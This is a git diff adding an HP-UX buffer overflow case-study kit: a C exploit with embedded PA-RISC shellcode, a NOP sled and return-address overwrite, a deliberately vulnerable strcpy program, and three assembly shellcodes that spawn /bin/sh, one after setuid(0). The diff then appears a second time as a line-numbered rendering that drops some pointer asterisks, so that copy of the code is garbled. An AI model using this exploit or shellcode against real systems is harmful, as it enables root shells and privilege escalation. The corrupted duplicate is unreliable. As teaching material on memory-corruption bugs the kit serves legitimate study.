11 files changed, 298 insertions, 0 deletions
diff --git a/other/shellkit/tmp/hpux-tools.tar.gz b/other/shellkit/tmp/hpux-tools.tar.gz
new file mode 100644
index 0000000..6fa3a5e
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools.tar.gz
Binary files differ
diff --git a/other/shellkit/tmp/hpux-tools/Makefile b/other/shellkit/tmp/hpux-tools/Makefile
new file mode 100644
index 0000000..19e8fd4
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/Makefile
@@ -0,0 +1,5 @@
+all: sample-one shell-one shell-two shell-tree
+sample-one:
+        @cd sample-one && make
diff --git a/other/shellkit/tmp/hpux-tools/README b/other/shellkit/tmp/hpux-tools/README
new file mode 100644
index 0000000..b6ee0df
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/README
@@ -0,0 +1,10 @@
+This archive contains following files:
+Makefile - make file to build the stuff
+sample-one - example of exploit and vulnerable program
+shell-one.s - shellcode (v1)
+shell-tree.s - shellcode (v2)
+shell-two.s  - shellcode (v3)
+--
+fygrave@tigerteam.net
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/Makefile b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
new file mode 100644
index 0000000..aea8390
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
@@ -0,0 +1,10 @@
+all: exploit vuln
+exploit: exploit.c
+        gcc exploit.c -o exploit
+vuln: vuln.c
+        gcc vuln.c -o vuln
+clean:
+        @rm -f core *.core *.o vuln exploit a.out
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/README b/other/shellkit/tmp/hpux-tools/sample-one/README
new file mode 100644
index 0000000..66be971
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/README
@@ -0,0 +1,5 @@
+These are examples for HP-UX buffer overflow case study. For more information 
+please see http://www.notlsd.net/bof/
+-- 
+fygrave@tigerteam.net                           Tue Mar 20 15:41:48 ICT 2001
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
new file mode 100644
index 0000000..11dc23c
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
@@ -0,0 +1,123 @@
+/*
+ * Sample exploit for HP-UX buffer overflows case study
+ */
+#include <stdio.h>
+#include <unistd.h>
+char shellcode[]=
+"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
+"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
+"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
+#define BUFFER_SIZE 180
+#define STACK_DSO -84
+#define NOP 0x0b390280
+#define PAD 0
+#define ALIGN 8
+#define ADB_PATH "/usr/bin/adb"
+#define VULNVAR "VULNBUF="
+#define MORE 1
+unsigned long get_sp(void)
+{
+   __asm__("copy %sp,%ret0 \n");
+}
+int main(int argc, char **argv) {
+int i, dso, align, padd, buf_size, adb, more;
+char *buf, *ptr;
+unsigned long retaddr;
+dso = STACK_DSO;
+align = ALIGN;
+padd = PAD;
+buf_size = BUFFER_SIZE;
+retaddr = 0;
+more = MORE;
+while ((i = getopt(argc, argv,
+                   "Dd:b:r:o:a:p:m:")) != EOF) {
+        switch (i) {
+        case 'd':
+        dso=(int) strtol(optarg, NULL, 0);
+        break;
+        case 'm':
+        more+=(int) strtol(optarg, NULL, 0);
+        break;
+        case 'b':
+        buf_size=(int)strtol(optarg, NULL, 0);
+        break;
+    case 'r':
+        retaddr = strtoul(optarg, NULL, 0);
+        break;
+        case 'a':
+            align = (int) strtol(optarg, NULL, 0);
+            break;
+        case 'p':
+            padd = (int) strtol(optarg, NULL, 0);
+            break;
+    case 'D':
+        adb = 1;  
+        break;
+        default:
+            fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
+            "[-r return_address]"
+                    "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
+            exit(1);
+            break;
+        }
+}
+buf=(char *)calloc(strlen(VULNVAR) + buf_size
+                   + sizeof(unsigned long)*more + 1, 1);
+ptr=buf;
+if (!buf) {
+    perror("calloc");
+    exit(1);
+}
+fprintf(stderr,"our stack %X\n",get_sp());
+if (!retaddr)
+    retaddr=get_sp()- dso + 3;
+fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
+                " buf_len: %i dso: %i more: %i\n",
+        retaddr, padd, align, buf_size, dso, more);
+strcpy(buf, VULNVAR);
+ptr+=strlen(VULNVAR);
+for(i=0;i<align; i++) *ptr++='A'; // fill in alignment
+for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
+    *ptr++=(NOP>>24)&0xff;
+    *ptr++=(NOP>>16)&0xff;
+    *ptr++=(NOP>>8)&0xff;
+    *ptr++=(NOP)&0xff;
+}
+strcat(buf, shellcode); // append shellcode
+ptr+=strlen(shellcode);
+for(i=0;i<padd; i++) *ptr++='B'; // padd
+for (i=0;i<more ; i++) {
+    *ptr++=(retaddr>>24)&0xff;
+    *ptr++=(retaddr>>16)&0xff;
+    *ptr++=(retaddr>>8)&0xff;
+    *ptr++=(retaddr)&0xff;
+}
+fprintf(stderr,"buflen is %i\n", strlen(buf));
+putenv(buf,1);
+if (adb) 
+    execl(ADB_PATH,"adb","vuln", NULL);
+else     
+    execl("./vuln","vuln",buf, NULL);
+perror("execl");
+return 0; // uff
+}
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/vuln.c b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c
new file mode 100644
index 0000000..698af76
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c
@@ -0,0 +1,34 @@
+/*
+ * Sample vulnerable program for HP-UX buffer overflows case study
+ */
+#include <stdio.h>
+#include <stdlib.h>
+unsigned long get_sp(void)
+{
+   __asm__("copy %sp,%ret0 \n");
+}
+void baz(char *argument) {
+    char badbuf[200];
+        printf("badbuf ptr is: %p\n",badbuf);
+        strcpy(badbuf,argument);
+}
+void foo(char *arg) {
+    baz(arg);
+}
+int main(int argc, char **argv) {
+char *param;
+printf("vuln stack is: 0x%X\n",get_sp());
+param=getenv("VULNBUF");
+foo(param);
+return 0;
+}
diff --git a/other/shellkit/tmp/hpux-tools/shell-one.s b/other/shellkit/tmp/hpux-tools/shell-one.s
new file mode 100644
index 0000000..afbf9f8
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-one.s
@@ -0,0 +1,39 @@
+    .SPACE $TEXT$
+    .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+    .align 4
+    .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+    bl         shellcode, %r1
+    nop
+    .SUBSPA $DATA$
+    .EXPORT shellcode; So we could see it in debugger
+shellcode
+        xor     %r26, %r26, %r26; 0 - argv0
+        ldil    L%0xc0000000,%r1;  entry point
+        ble     0x4(%sr7,%r1)    ;
+        ldi     23, %r22
+jump
+        bl      .+8,%r1      ; address into %r1
+        nop
+        stb     %r0, SHELL-jump+7-11(%sr0,%r1)
+        xor     %r25, %r25, %r25; NULL ->arg1
+        ldi     SHELL-jump-11, %r26;
+        add     %r1, %r26, %r26;
+        ldil    L%0xc0000000,%r1;  entry point
+        ble     0x4(%sr7,%r1)    ;
+        ldi     11, %r22;
+        xor     %r26, %r26, %r26; return 0
+        ldil    L%0xc0000000,%r1;  entry point
+        ble     0x4(%sr7,%r1)    ;
+        ldi     1, %r22          ; exit 
+SHELL
+                .STRING "/bin/shA";
+endofshellcode
diff --git a/other/shellkit/tmp/hpux-tools/shell-tree.s b/other/shellkit/tmp/hpux-tools/shell-tree.s
new file mode 100644
index 0000000..c3044da
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-tree.s
@@ -0,0 +1,31 @@
+    .SPACE $TEXT$
+    .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+    .align 4
+    .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+    bl         shellcode, %r1
+    nop
+    .SUBSPA $DATA$
+    .EXPORT shellcode; So we could see it in debugger
+shellcode
+        bl      .+4,%r1      ; address into %r1
+        addi    500, %r1, %r3;
+        stb     %r0, SHELL-shellcode+7-11-500(%sr0,%r3)
+        xor     %r25, %r25, %r25; NULL ->arg1
+        ldi     SHELL-shellcode-11-500, %r26;
+        add     %r3, %r26, %r26;
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    511, %r22, %r22 ;
+SHELL
+                .STRING "/bin/shA";
+endofshellcode
diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s
new file mode 100644
index 0000000..5dac10f
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-two.s
@@ -0,0 +1,41 @@
+    .SPACE $TEXT$
+    .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+    .align 4
+    .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+    bl         shellcode, %r1
+    nop
+    .SUBSPA $DATA$
+    .EXPORT shellcode; So we could see it in debugger
+shellcode
+        xor     %r26, %r26, %r26; 0 - argv0
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    523, %r22, %r22 ; setuid(0)
+jump
+        bl      .+4,%r1      ; address into %r1
+        addi    500, %r1, %r3;
+        stb     %r0, SHELL-jump+7-11-500(%sr0,%r3)
+        xor     %r25, %r25, %r25; NULL ->arg1
+        ldi     SHELL-jump-11-500, %r26;
+        add     %r3, %r26, %r26;
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    511, %r22, %r22 ;
+        xor     %r26, %r26, %r26; return 0
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    501, %r22, %r22 ; exit 
+SHELL
+                .STRING "/bin/shA";
+endofshellcode
diff --git a/other/shellkit/tmp/hpux_bof.pdf b/other/shellkit/tmp/hpux_bof.pdf
new file mode 100644
index 0000000..6d2a957
--- /dev/null
+++ b/other/shellkit/tmp/hpux_bof.pdf
Binary files differ

diff --git a/other/shellkit/tmp/hpux-tools.tar.gz b/other/shellkit/tmp/hpux-tools.tar.gz new file mode 100644 index 0000000..6fa3a5e --- /dev/null +++ b/other/shellkit/tmp/hpux-tools.tar.gz
Binary files differ


diff --git a/other/shellkit/tmp/hpux-tools/Makefile b/other/shellkit/tmp/hpux-tools/Makefile new file mode 100644 index 0000000..19e8fd4 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/Makefile
@@ -0,0 +1,5 @@
	1	all: sample-one shell-one shell-two shell-tree
	2
	3
	4	sample-one:
	5	@cd sample-one && make


diff --git a/other/shellkit/tmp/hpux-tools/README b/other/shellkit/tmp/hpux-tools/README new file mode 100644 index 0000000..b6ee0df --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/README
@@ -0,0 +1,10 @@
	1	This archive contains following files:
	2	Makefile - make file to build the stuff
	3	sample-one - example of exploit and vulnerable program
	4	shell-one.s - shellcode (v1)
	5	shell-tree.s - shellcode (v2)
	6	shell-two.s - shellcode (v3)
	7
	8
	9	--
	10	fygrave@tigerteam.net


diff --git a/other/shellkit/tmp/hpux-tools/sample-one/Makefile b/other/shellkit/tmp/hpux-tools/sample-one/Makefile new file mode 100644 index 0000000..aea8390 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
@@ -0,0 +1,10 @@
	1	all: exploit vuln
	2
	3	exploit: exploit.c
	4	gcc exploit.c -o exploit
	5	vuln: vuln.c
	6	gcc vuln.c -o vuln
	7
	8
	9	clean:
	10	@rm -f core .core .o vuln exploit a.out


diff --git a/other/shellkit/tmp/hpux-tools/sample-one/README b/other/shellkit/tmp/hpux-tools/sample-one/README new file mode 100644 index 0000000..66be971 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/README
@@ -0,0 +1,5 @@
	1	These are examples for HP-UX buffer overflow case study. For more information
	2	please see http://www.notlsd.net/bof/
	3
	4	--
	5	fygrave@tigerteam.net Tue Mar 20 15:41:48 ICT 2001


diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c new file mode 100644 index 0000000..11dc23c --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
@@ -0,0 +1,123 @@
	1	/*
	2	* Sample exploit for HP-UX buffer overflows case study
	3	*/
	4	#include <stdio.h>
	5	#include <unistd.h>
	6
	7
	8	char shellcode[]=
	9	"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
	10	"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
	11	"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
	12
	13	#define BUFFER_SIZE 180
	14	#define STACK_DSO -84
	15	#define NOP 0x0b390280
	16	#define PAD 0
	17	#define ALIGN 8
	18	#define ADB_PATH "/usr/bin/adb"
	19	#define VULNVAR "VULNBUF="
	20	#define MORE 1
	21
	22
	23	unsigned long get_sp(void)
	24	{
	25	__asm__("copy %sp,%ret0 \n");
	26	}
	27
	28	int main(int argc, char **argv) {
	29	int i, dso, align, padd, buf_size, adb, more;
	30	char buf, ptr;
	31	unsigned long retaddr;
	32
	33
	34	dso = STACK_DSO;
	35	align = ALIGN;
	36	padd = PAD;
	37	buf_size = BUFFER_SIZE;
	38	retaddr = 0;
	39	more = MORE;
	40
	41
	42
	43
	44	while ((i = getopt(argc, argv,
	45	"Dd:b:r:o:a:p:m:")) != EOF) {
	46	switch (i) {
	47	case 'd':
	48	dso=(int) strtol(optarg, NULL, 0);
	49	break;
	50	case 'm':
	51	more+=(int) strtol(optarg, NULL, 0);
	52	break;
	53	case 'b':
	54	buf_size=(int)strtol(optarg, NULL, 0);
	55	break;
	56	case 'r':
	57	retaddr = strtoul(optarg, NULL, 0);
	58	break;
	59	case 'a':
	60	align = (int) strtol(optarg, NULL, 0);
	61	break;
	62	case 'p':
	63	padd = (int) strtol(optarg, NULL, 0);
	64	break;
	65	case 'D':
	66	adb = 1;
	67	break;
	68	default:
	69	fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
	70	"[-r return_address]"
	71	"[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
	72	exit(1);
	73	break;
	74	}
	75	}
	76
	77
	78	buf=(char *)calloc(strlen(VULNVAR) + buf_size
	79	+ sizeof(unsigned long)*more + 1, 1);
	80	ptr=buf;
	81	if (!buf) {
	82	perror("calloc");
	83	exit(1);
	84	}
	85
	86	fprintf(stderr,"our stack %X\n",get_sp());
	87	if (!retaddr)
	88	retaddr=get_sp()- dso + 3;
	89	fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
	90	" buf_len: %i dso: %i more: %i\n",
	91	retaddr, padd, align, buf_size, dso, more);
	92
	93	strcpy(buf, VULNVAR);
	94	ptr+=strlen(VULNVAR);
	95	for(i=0;i<align; i++) *ptr++='A'; // fill in alignment
	96
	97	for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
	98	*ptr++=(NOP>>24)&0xff;
	99	*ptr++=(NOP>>16)&0xff;
	100	*ptr++=(NOP>>8)&0xff;
	101	*ptr++=(NOP)&0xff;
	102	}
	103
	104	strcat(buf, shellcode); // append shellcode
	105	ptr+=strlen(shellcode);
	106
	107	for(i=0;i<padd; i++) *ptr++='B'; // padd
	108
	109	for (i=0;i<more ; i++) {
	110	*ptr++=(retaddr>>24)&0xff;
	111	*ptr++=(retaddr>>16)&0xff;
	112	*ptr++=(retaddr>>8)&0xff;
	113	*ptr++=(retaddr)&0xff;
	114	}
	115	fprintf(stderr,"buflen is %i\n", strlen(buf));
	116	putenv(buf,1);
	117	if (adb)
	118	execl(ADB_PATH,"adb","vuln", NULL);
	119	else
	120	execl("./vuln","vuln",buf, NULL);
	121	perror("execl");
	122	return 0; // uff
	123	}


diff --git a/other/shellkit/tmp/hpux-tools/sample-one/vuln.c b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c new file mode 100644 index 0000000..698af76 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c
@@ -0,0 +1,34 @@
	1	/*
	2	* Sample vulnerable program for HP-UX buffer overflows case study
	3	*/
	4	#include <stdio.h>
	5	#include <stdlib.h>
	6
	7
	8	unsigned long get_sp(void)
	9	{
	10	__asm__("copy %sp,%ret0 \n");
	11	}
	12
	13	void baz(char *argument) {
	14	char badbuf[200];
	15
	16	printf("badbuf ptr is: %p\n",badbuf);
	17	strcpy(badbuf,argument);
	18	}
	19
	20	void foo(char *arg) {
	21
	22	baz(arg);
	23
	24	}
	25
	26	int main(int argc, char **argv) {
	27	char *param;
	28
	29	printf("vuln stack is: 0x%X\n",get_sp());
	30	param=getenv("VULNBUF");
	31	foo(param);
	32
	33	return 0;
	34	}


diff --git a/other/shellkit/tmp/hpux-tools/shell-one.s b/other/shellkit/tmp/hpux-tools/shell-one.s new file mode 100644 index 0000000..afbf9f8 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-one.s
@@ -0,0 +1,39 @@
	1	.SPACE $TEXT$
	2	.SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
	3
	4	.align 4
	5	.EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
	6	main
	7
	8	bl shellcode, %r1
	9	nop
	10	.SUBSPA $DATA$
	11	.EXPORT shellcode; So we could see it in debugger
	12	shellcode
	13	xor %r26, %r26, %r26; 0 - argv0
	14	ldil L%0xc0000000,%r1; entry point
	15	ble 0x4(%sr7,%r1) ;
	16	ldi 23, %r22
	17
	18	jump
	19	bl .+8,%r1 ; address into %r1
	20	nop
	21	stb %r0, SHELL-jump+7-11(%sr0,%r1)
	22
	23	xor %r25, %r25, %r25; NULL ->arg1
	24	ldi SHELL-jump-11, %r26;
	25	add %r1, %r26, %r26;
	26
	27	ldil L%0xc0000000,%r1; entry point
	28	ble 0x4(%sr7,%r1) ;
	29	ldi 11, %r22;
	30
	31	xor %r26, %r26, %r26; return 0
	32	ldil L%0xc0000000,%r1; entry point
	33	ble 0x4(%sr7,%r1) ;
	34	ldi 1, %r22 ; exit
	35
	36	SHELL
	37	.STRING "/bin/shA";
	38
	39	endofshellcode


diff --git a/other/shellkit/tmp/hpux-tools/shell-tree.s b/other/shellkit/tmp/hpux-tools/shell-tree.s new file mode 100644 index 0000000..c3044da --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-tree.s
@@ -0,0 +1,31 @@
	1	.SPACE $TEXT$
	2	.SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
	3
	4	.align 4
	5	.EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
	6	main
	7
	8	bl shellcode, %r1
	9	nop
	10	.SUBSPA $DATA$
	11	.EXPORT shellcode; So we could see it in debugger
	12	shellcode
	13
	14	bl .+4,%r1 ; address into %r1
	15	addi 500, %r1, %r3;
	16	stb %r0, SHELL-shellcode+7-11-500(%sr0,%r3)
	17
	18	xor %r25, %r25, %r25; NULL ->arg1
	19	ldi SHELL-shellcode-11-500, %r26;
	20	add %r3, %r26, %r26;
	21
	22	ldil L%0xc0000000,%r1; entry point
	23	ldi 500, %r22 ;
	24	ble 0x4(%sr7,%r1) ;
	25	subi 511, %r22, %r22 ;
	26
	27
	28	SHELL
	29	.STRING "/bin/shA";
	30
	31	endofshellcode


diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s new file mode 100644 index 0000000..5dac10f --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-two.s
@@ -0,0 +1,41 @@
	1	.SPACE $TEXT$
	2	.SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
	3
	4	.align 4
	5	.EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
	6	main
	7
	8	bl shellcode, %r1
	9	nop
	10	.SUBSPA $DATA$
	11	.EXPORT shellcode; So we could see it in debugger
	12	shellcode
	13	xor %r26, %r26, %r26; 0 - argv0
	14	ldil L%0xc0000000,%r1; entry point
	15	ldi 500, %r22 ;
	16	ble 0x4(%sr7,%r1) ;
	17	subi 523, %r22, %r22 ; setuid(0)
	18	jump
	19	bl .+4,%r1 ; address into %r1
	20	addi 500, %r1, %r3;
	21	stb %r0, SHELL-jump+7-11-500(%sr0,%r3)
	22
	23	xor %r25, %r25, %r25; NULL ->arg1
	24	ldi SHELL-jump-11-500, %r26;
	25	add %r3, %r26, %r26;
	26
	27	ldil L%0xc0000000,%r1; entry point
	28	ldi 500, %r22 ;
	29	ble 0x4(%sr7,%r1) ;
	30	subi 511, %r22, %r22 ;
	31
	32	xor %r26, %r26, %r26; return 0
	33	ldil L%0xc0000000,%r1; entry point
	34	ldi 500, %r22 ;
	35	ble 0x4(%sr7,%r1) ;
	36	subi 501, %r22, %r22 ; exit
	37
	38	SHELL
	39	.STRING "/bin/shA";
	40
	41	endofshellcode


diff --git a/other/shellkit/tmp/hpux_bof.pdf b/other/shellkit/tmp/hpux_bof.pdf new file mode 100644 index 0000000..6d2a957 --- /dev/null +++ b/other/shellkit/tmp/hpux_bof.pdf
Binary files differ